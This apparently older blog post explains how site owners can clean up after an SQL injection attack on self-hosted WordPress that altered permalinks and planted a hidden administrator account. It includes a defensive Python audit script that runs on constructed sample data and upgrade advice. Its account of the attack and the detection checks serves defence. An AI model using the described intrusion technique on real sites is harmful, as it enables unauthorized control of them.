I’ve recently come across a new hacker attack on WordPress blogs. The attack is what’s called an “SQL Injection” attack, an exploit that lets a hacker execute attacker-modified SQL code against your blog’s database. In this case the modified code changes the values used for all of your blog’s permalinks. In most cases, this simply makes the permalinks useless. But it could potentially be used by the hacker to perform further exploits against your blog, which can be really bad news.
The modified permalink looks something like this:
or this:
Only self-hosted WordPress installs are affected by this, so if you have a WordPress blog on wordpress.com, you don’t have anything to worry about.
Removal
Removal of the problem can be accomplished in a few steps:
1. Edit your permalinks
Log in to your blog’s administration area and go to the Settings | Permalinks configuration page. You will need to remove the added permalink code and reset the option back to what you had previously configured.
2. Remove the additional administrator
Part of the exploit resulted in a new and “hidden” administrator account being added. Go to the Users configuration page and click on the “Administrator” user type to filter the list of users to Administrators only. You will need to find the most recently added administrator. This can be done by mousing over the “Edit” option for each user and finding the highest user_id value displayed in your browser’s status bar. Edit the account with the highest user_id value. When the edit page comes up, modify the URL by adding 1 to the user_id value. So, if the last (highest) user_id value was 38, edit user 38 and then change the URL to user 39, and you will be editing the “hidden” administrator. This user will have a strange first name. Change the name to something else, like “xxx”, then change their Role to “Subscriber,” and click “Update User” to save your changes. Once this is done, you can return to the list of users, find the same account and delete it.
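The two removal steps above both come down to checking the database directly: look at the stored permalink structure, and list every account that actually holds the administrator capability regardless of what the Users screen shows. The following audit script is an added example written for this post, not code from the post or from WordPress. It uses an in-memory SQLite copy of a trimmed-down wp_options, wp_users and wp_usermeta schema with constructed sample rows (user 39 stands in for the hidden administrator, and the permalink value is a placeholder, not the real injected string); against a live site you would point the same queries at the MySQL database, with your own table prefix in place of `wp_`. The character whitelist for a "normal" permalink structure is an assumption of this example.

```python
import re
import sqlite3

# WordPress permalink structures are built from tags such as %year% and
# %postname% plus slashes, dashes, dots and plain words. Anything outside
# this set (angle brackets, quotes, spaces) is worth a human look.
# This whitelist is an assumption of the example, not a WordPress rule.
SAFE_PERMALINK = re.compile(r"^[A-Za-z0-9_\-/.%]*$")

# Constructed sample data: a simplified stand-in for the real MySQL tables.
SAMPLE_OPTIONS = [
    ("siteurl", "http://blog.example.invalid"),
    ("permalink_structure", "/%postname%/<injected-placeholder>"),
]
SAMPLE_USERS = [  # (ID, user_login, display_name, user_registered)
    (1, "admin", "Site Owner", "2008-01-05 09:00:00"),
    (38, "editor", "Regular Editor", "2009-06-12 14:20:00"),
    (39, "zz9x", "q\u0001w", "2009-08-20 03:11:47"),  # odd name, added last
    (40, "reader", "A Reader", "2009-08-21 08:00:00"),
]
ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'   # serialized PHP array
SUBSCRIBER_CAPS = 'a:1:{s:10:"subscriber";b:1;}'
SAMPLE_USERMETA = [  # (user_id, meta_key, meta_value)
    (1, "wp_capabilities", ADMIN_CAPS),
    (38, "wp_capabilities", ADMIN_CAPS),
    (39, "wp_capabilities", ADMIN_CAPS),
    (40, "wp_capabilities", SUBSCRIBER_CAPS),
]


def load_sample_db():
    """Build the in-memory stand-in database from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               display_name TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_options VALUES (?, ?)", SAMPLE_OPTIONS)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)", SAMPLE_USERMETA)
    return conn


def permalink_structure(conn):
    """Return (value, is_suspicious) for the stored permalink structure."""
    row = conn.execute(
        "SELECT option_value FROM wp_options WHERE option_name = 'permalink_structure'"
    ).fetchone()
    value = row[0] if row else ""
    return value, SAFE_PERMALINK.match(value) is None


def administrators(conn):
    """Every user whose capabilities meta grants administrator, oldest ID first.
    Reading wp_usermeta directly sidesteps whatever hides the account in the UI."""
    return conn.execute("""
        SELECT u.ID, u.user_login, u.display_name, u.user_registered
        FROM wp_users u
        JOIN wp_usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = 'wp_capabilities'
          AND m.meta_value LIKE '%"administrator"%'
        ORDER BY u.ID
    """).fetchall()


def non_printable_name(name):
    """True if a display name holds control characters (the 'strange name' clue)."""
    return any(ord(c) < 32 or ord(c) == 127 for c in name)


def audit(conn):
    """Collect human-readable findings for the two cleanup steps."""
    findings = []
    value, suspicious = permalink_structure(conn)
    if suspicious:
        findings.append(f"permalink_structure has unexpected characters: {value!r}")
    admins = administrators(conn)
    if admins:
        newest = admins[-1]
        findings.append(f"newest administrator is ID {newest[0]} ({newest[1]!r}), "
                        f"registered {newest[3]}; confirm it is yours")
    for uid, login, display, _ in admins:
        if non_printable_name(display):
            findings.append(f"administrator ID {uid} ({login!r}) has a non-printable display name")
    return findings


if __name__ == "__main__":
    for line in audit(load_sample_db()):
        print("*", line)
```

Run it and every finding is one thing to verify by hand: reset the permalink option if it is flagged, and treat any administrator you did not create (here ID 39) exactly as the post describes, demoting it to Subscriber and then deleting it.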
Further Steps
This fixes the damage done and gets your permalinks working, but will not keep the problem from happening again. To do that, you will have to upgrade to the latest version of WordPress, version 2.8.4. Versions prior to 2.8.4 are susceptible to the attack and you could find yourself going through these steps again.
It’s a good idea to keep current on your WordPress software version all the time, but in this case it’s a requirement in order to avoid being hacked again. So click on the “Please update now” link at the top of your administration screen and you should be good to go from this point forward.